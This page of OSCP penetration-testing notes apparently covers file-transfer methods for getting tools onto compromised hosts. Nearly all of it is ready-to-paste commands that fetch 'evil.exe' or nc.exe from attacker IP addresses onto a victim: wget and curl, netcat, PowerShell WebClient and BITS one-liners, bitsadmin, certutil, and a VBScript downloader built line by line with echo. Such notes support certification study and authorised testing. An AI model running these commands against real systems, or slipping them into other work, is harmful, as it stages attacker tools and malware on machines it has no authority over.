OSCP Notes
Search…
File transfer Methodology

Setup HTTP Server

1
python -m SimpleHTTPServer 80
Copied!

Linux download command

1
wget http://attackerip/file
Copied!
1
curl http://attackerip/file > file
Copied!

netcat

Set up your victim to listen for the incoming request
1
nc -nvlp 55555 > file
Copied!
Send the file
1
nc $victimip 55555 < file
Copied!

SCP

Copy a file
1
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.ext
Copied!
Copy dir
1
scp -r /path/to/source/dir [email protected]:/path/to/destination
Copied!

Powershell

1
powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://192.168.189.131:7777/evil.exe', '%temp%\evil.exe');
Copied!
1
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.x/nc.exe','c:\temp\nc.exe')
Copied!
1
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.x/nc.exe -Destination C:\temp\nc.exe")
Copied!
1
powershell.exe wget "http://10.10.14.x/nc.exe" -outfile "c:\temp\nc.exe"
Copied!

Bitsadmin

1
bitsadmin /transfer evil /download /priority high http://192.168.189.131:9995/evil.exe %temp%\evil.exe
Copied!

Certutil

1
certutil.exe -urlcache -split -f http://192.168.189.131:7777/evil.exe evil.exe
Copied!

VBScript

1
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
2
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
3
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
4
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
5
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
6
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
7
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
8
echo Err.Clear >> wget.vbs
9
echo Set http = Nothing >> wget.vbs
10
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
11
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
12
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
13
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
14
echo http.Open "GET", strURL, False >> wget.vbs
15
echo http.Send >> wget.vbs
16
echo varByteArray = http.ResponseBody >> wget.vbs
17
echo Set http = Nothing >> wget.vbs
18
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
19
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
20
echo strData = "" >> wget.vbs
21
echo strBuffer = "" >> wget.vbs
22
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
23
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
24
echo Next >> wget.vbs
25
echo ts.Close >> wget.vbs
Copied!
After that run this command
1
cscript /nologo wget.vbs http://10.10.14.x/nc.exe nc.exe
Copied!

A few more methods

Last modified 1yr ago